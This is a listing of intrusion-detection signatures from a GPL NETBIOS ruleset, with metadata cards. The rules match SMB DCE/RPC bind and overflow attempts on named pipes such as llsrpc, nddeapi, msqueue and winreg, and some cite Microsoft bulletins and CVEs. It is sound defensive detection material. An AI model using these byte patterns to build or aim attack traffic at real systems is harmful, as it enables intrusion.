alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS RemoteActivation unicode attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8; classtype:protocol-command-decode; sid:2103419; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS RemoteActivation unicode attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103420

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS RemoteActivation unicode little endian attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8,little; classtype:protocol-command-decode; sid:2103420; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS RemoteActivation unicode little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103248

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS irot bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"`|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?"; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103248; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS irot bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103249

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS irot little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"`|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?"; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103249; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS irot little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103250

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS irot unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"`|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?"; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103250; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS irot unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103251

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS irot unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"`|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?"; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103251; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS irot unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103123

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrconnect little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,52,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103123; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrconnect little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103122

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrconnect overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,52,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103122; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrconnect overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103125

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrconnect unicode little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,104,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103125; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrconnect unicode little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103124

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrconnect unicode overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,104,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103124; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrconnect unicode overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103106

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103106; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103094

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|5C|llsrpc|00|"; within:8; distance:78; nocase; classtype:protocol-command-decode; sid:2103094; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103107

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103107; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103108

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103108; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103095

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc unicode create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|5C 00|l|00|l|00|s|00|r|00|p|00|c|00 00 00|"; within:16; distance:78; nocase; classtype:protocol-command-decode; sid:2103095; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc unicode create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103109

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103109; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103170

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS msqueue unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103170; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS msqueue unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103171

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS msqueue unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103171; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS msqueue unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102934

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; flowbits:set,smb.tree.bind.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102934; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS nddeapi bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102930

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|5C|nddeapi|00|"; within:9; distance:78; nocase; flowbits:set,smb.tree.create.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102930; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS nddeapi create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102935

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi unicode bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; flowbits:set,smb.tree.bind.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102935; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS nddeapi unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102931

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi unicode create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|5C 00|n|00|d|00|d|00|e|00|a|00|p|00|i|00 00 00|"; within:18; distance:78; nocase; flowbits:set,smb.tree.create.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102931; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS nddeapi unicode create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103210

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103210; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103211

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103211; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103212

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103212; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103213

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103213; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

